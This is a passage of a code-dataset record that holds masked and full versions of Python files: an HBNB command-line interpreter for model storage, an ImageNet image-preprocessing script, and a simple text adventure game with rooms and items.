"step-4": "<mask token>\nimport cmd\nimport models\nimport re\nfrom models.base_model import BaseModel\nfrom models import storage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\" This class to setup the command interpreter \"\"\"\n __DCT_CLS = {'BaseModel': BaseModel, 'User': User, 'State': State,\n 'City': City, 'Amenity': Amenity, 'Place': Place, 'Review': Review}\n prompt = '(hbnb) '\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' 
+ arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't 
exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n",
"step-5": "#!/usr/bin/python3\n\"\"\"\nprogram of the command interpreter\n\"\"\"\n\nimport cmd\nimport models\nimport re\nfrom models.base_model import BaseModel\nfrom models import storage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\" This class to setup the command interpreter \"\"\"\n __DCT_CLS = {\n \"BaseModel\": BaseModel,\n \"User\": User,\n \"State\": State,\n \"City\": City,\n \"Amenity\": Amenity,\n \"Place\": Place,\n \"Review\": Review\n }\n prompt = \"(hbnb) \"\n\n def do_quit(self, line):\n '''Exit the CMD program'''\n return True\n\n def do_EOF(self, line):\n '''Exit the CMD program'''\n return True\n\n def emptyline(self):\n '''Do nothing'''\n pass\n\n def do_create(self, line):\n '''Creates a new instance of BaseModel'''\n arg_line = line.split()\n\n if line == \"\":\n print(\"** class name missing **\")\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if (type(line) == str):\n arg_line = line.split()\n len_args = len(arg_line)\n\n if (self.check_if_created(arg_line, len_args) != 1):\n\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = models.storage.all()\n\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print(\"** no instance found **\")\n else:\n srch_id = line[0] + \".\" + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print(\"** no instance found **\")\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if (self.check_if_created(arg_line, len_args) != 1):\n\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = 
models.storage.all()\n\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print(\"** no instance found **\")\n\n def do_all(self, line):\n arg_line = line.split()\n if line == \"\" or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n\n if (self.check_if_created(arg_line, len_args) == 1):\n pass\n elif (len_args == 2):\n print(\"** attribute name missing **\")\n elif (len_args == 3):\n print(\"** value missing **\")\n else:\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', \"\")\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print(\"** no instance found **\")\n\n def default(self, line):\n '''all method names that aren't defined'''\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == \"all()\":\n self.do_all(args_line[0])\n if args_line[1] == \"count()\":\n self.do_count(args_line[0])\n\n my_count = args_line[1].split('\"')\n res = re.findall(r'\\(.*?\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == \"show()\":\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n '''Verifies if class exists'''\n if len_args == 0:\n print(\"** class name missing **\")\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist 
**\")\n return 1\n elif (len_args == 1):\n print(\"** instance id missing **\")\n return 1\n\n def do_count(self, line):\n '''Counts the number of existing instances'''\n arg_line = line.split()\n if line == \"\" or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == \"__main__\":\n HBNBCommand().cmdloop()\n",
"step-ids": [
9,
11,
12,
16,
17
]
}
|
[
9,
11,
12,
16,
17
] |
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(
img_size,
interpolation=args.interpolation,
use_prefetcher=args.use_prefetcher,
mean=args.mean,
std=args.std,
crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, "===", i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(
[x * 255 for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + ".bin"))
def main():
    """Parse CLI arguments, fix the normalization constants, and run preprocess()."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--src_path', default='', type=str)
    parser.add_argument('--save_path', default='', type=str)
    parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',
                        help='Image resize interpolation type (overrides model)')
    # BUG FIX: this was declared as 'use_prefetcher' (no leading dashes), which
    # argparse treats as a positional argument; combining a positional with
    # action='store_true' is broken. It must be an optional flag.
    parser.add_argument('--use_prefetcher', action='store_true', default=True,
                        help='enable fast prefetcher')
    parser.add_argument('--crop-pct', default=0.9, type=float,
                        metavar='N', help='Input image center crop percent (for validation only)')
    args = parser.parse_args()
    # Standard ImageNet statistics and the model's fixed input geometry.
    args.mean = (0.485, 0.456, 0.406)
    args.std = (0.229, 0.224, 0.225)
    args.input_size = (3, 224, 224)

    if not os.path.exists(args.save_path):
        os.makedirs(args.save_path)

    preprocess(args, args.src_path, args.save_path)


if __name__ == '__main__':
    main()
|
flexible
|
{
"blob_id": "443ed24ab396e83dbf12558207376258124bca8b",
"index": 4094,
"step-1": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport numpy as np\n\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n\n preprocesser = transforms_imagenet_eval(\n img_size,\n interpolation=args.interpolation,\n use_prefetcher=args.use_prefetcher,\n mean=args.mean,\n std=args.std,\n crop_pct=args.crop_pct)\n\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, \"===\", i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(\n [x * 255 for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + \".bin\"))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',\n help='Image resize interpolation type (overrides model)')\n 
parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float,\n metavar='N', help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = (0.485, 0.456, 0.406)\n args.std = (0.229, 0.224, 0.225)\n args.input_size = (3, 224, 224)\n\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from room import Room
from player import Player
from item import Item
# Declare all the items that can appear in rooms: name + effect description.
items = {
    'scimitar': Item('Scimitar', '+7 Attack'),
    'mace': Item('Mace', '+13 Attack'),
    'tower_shield': Item('Tower Shield', '+8 Block'),
    'heraldic_shield': Item('Heraldic Shield', '+12 Block'),
    'chainmail': Item('Chainmail', '+15 Defense'),
    'gold_plate': Item('Gold Plate', '+25 Defense'),
    'health_potion': Item('Health Potion', 'Heal 10 HP'),
    'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),
    'gold': Item('Gold', 'Currency for other items from vendors'),
    'demon_heart': Item('Demon Heart', 'Bestows owner with great power')
}

# Declare all the rooms. Triple-quoted descriptions are printed verbatim.
room = {
    'outside': Room("Outside Cave Entrance",
                    """North of you, the cave mount beckons""",
                    [items['scimitar'], items['health_potion']]),

    'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east.""",
                  [items['tower_shield'], items['chainmail']]),

    'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm.""",
                     [items['mace'], items['mana_potion']]),

    'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""",
                   [items['gold_plate'], items['heraldic_shield']]),

    'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south.""",
                     [items['gold'], items['demon_heart']]),
}

# Link rooms together: <dir>_to attributes point at the neighbouring room.
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']

# Main game loop: print the current room, read a command, move or quit.
player = Player(room['outside'])

suppressRoomPrint = False

while True:
    if suppressRoomPrint:
        # Skip re-printing the room right after an invalid move.
        suppressRoomPrint = False
    else:
        print(player.location)
        print(f'\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n')
    inp = input("What is your command: ")

    if inp == "q":
        break
    # Membership test replaces the chained or-comparisons.
    if inp in ("n", "s", "w", "e"):
        newRoom = player.location.getRoomInDirection(inp)
        # BUG FIX (idiom): compare against None with 'is', not '=='.
        if newRoom is None:
            print('\x1b[1;37;41m + \nImpossible, try again.\n\x1b[0m')
            suppressRoomPrint = True
        else:
            player.change_location(newRoom)
normal
|
{
"blob_id": "07a172c28057dc803efdbdc10a9e2e11df4e527b",
"index": 3134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-3": "<mask token>\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. 
The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
